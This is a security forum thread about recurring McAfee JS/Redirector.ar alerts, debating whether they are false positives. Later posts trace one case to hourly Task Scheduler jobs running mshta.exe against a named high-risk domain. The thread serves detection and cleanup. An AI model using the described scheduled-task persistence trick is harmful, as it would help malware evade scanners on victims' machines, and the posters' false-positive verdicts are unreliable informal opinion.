Reviewing my top threat events I have a large number of JS/redirector.ar alerts. Upon review, I strongly feel these are false positives. Why? Because sone of the threat target paths are files from are our own websites and from my knowledge have no reports of dropping malware on anyones PC. We have an outbound web proxy as well, which would likely have alerted us to any malicous content or websites. So why do I have so many JS/redirector.ar alerts? How can I stop them from a different network layer vs. on the client endpoint? I have web proxies, which I expect should defend against this attack vector, so why aren't they or is McAfee filling my log books with false positives.....likely he case, so what's the best way to stop the noise, without losing security?
An example threat target path is
temporary internet files\content.ie5\adcdf\169comparison.htm
I'm receiving similar alerts. Were you able to find a resolution?
No resolution, after more research I really think 80% of these are false positives.
That's what I feared. Unfortunately I can't find much, if anything, about this alert. Full scans of "infected" machines do not find anything else.
Well...good luck and I hope you find the cause.
Same here... found out that ALL of these alerts were False/Positives. Depends on redirection parameters of Java-Scripts on Web-Site. Seems like a "generic" pattern. But unfortunaltely no way to avoid that..This has to be corrected by McAfee.
This Redirector is also being detected by McAfee on some home PCs. A poster has noted that in his Security History the detection is being made once an hour, consistently.
If this is not a false positive that hourly detection might be significant, but I don't know if this is because the AV software is making an hourly check (seems unlikely) or something is creating the file once an hour.
That detected file has the name "LoginCA<xxxxnn>.htm" which looks like a login screen for some website. The location is in a hidden folder (Network Service\Local Settings\Temporary Internet Files\Content.IE5).
Can posters to this thread check their event logs to see whether there is a similar pattern of detection at fixed intervals?
Hourly detection seems rather suspicous to me. This might be a truly infection where malware tries to connect to command-server. Delete temporary internet files first - if dectection contines (without surfing on the internet) then do a full-scan with av.
I'am getting these alerts while surfing on different (harmless) sites only.
Nachricht geändert durch schgu on 10.05.13 15:36:03 MESZ
This is what Microsoft has to say about Trojan JS/Redirector.ar : I'm assuming that McAfee and Microsoft are referring to the same Redirector.
So yes, it's possible the poster in the thread in the Consumer section is seeing the effects of downloaded malware. A Full McAfee scan found nothing, but the hourly quaranting of the file noted above is continuing.
this is correct. Microsoft Encyclopedia entry has been updated april 2011. this is, in my case strong indication for false/positive. today there are some dozens of newer variations from JS/Redirector in the field. Why should this "old-chap" appear so often during the last 4-5 weeks ?
In your case seems to be a different story. Why not try a different scanner to double-check ?
For example this one (or similar)
The poster in the Consumer section found a batch of ATnn tasks in Task Scheduler, one per hour of the day. That accounts for McAfee's hourly detection of the Redirector, and also why scans with McAfee and Malwarebytes failed to find anything. Each hourly task created an instance of mshta.exe and tried to connect to global-network-solution.com, a site rated High Risk by TrustedSource (and Red rated by SiteAdvisor, so don't try to go there). The interesting part is why, for a Red site, the connection was allowed, as it must have been.
Still, the relevant information here is Task Scheduler. Perhaps everyone seeing this detection should check their scheduled tasks. And Googling shows that this technique (with the hourly AT.. tasks, and mshta.exe) has been used successfully for years. Simple, but effective.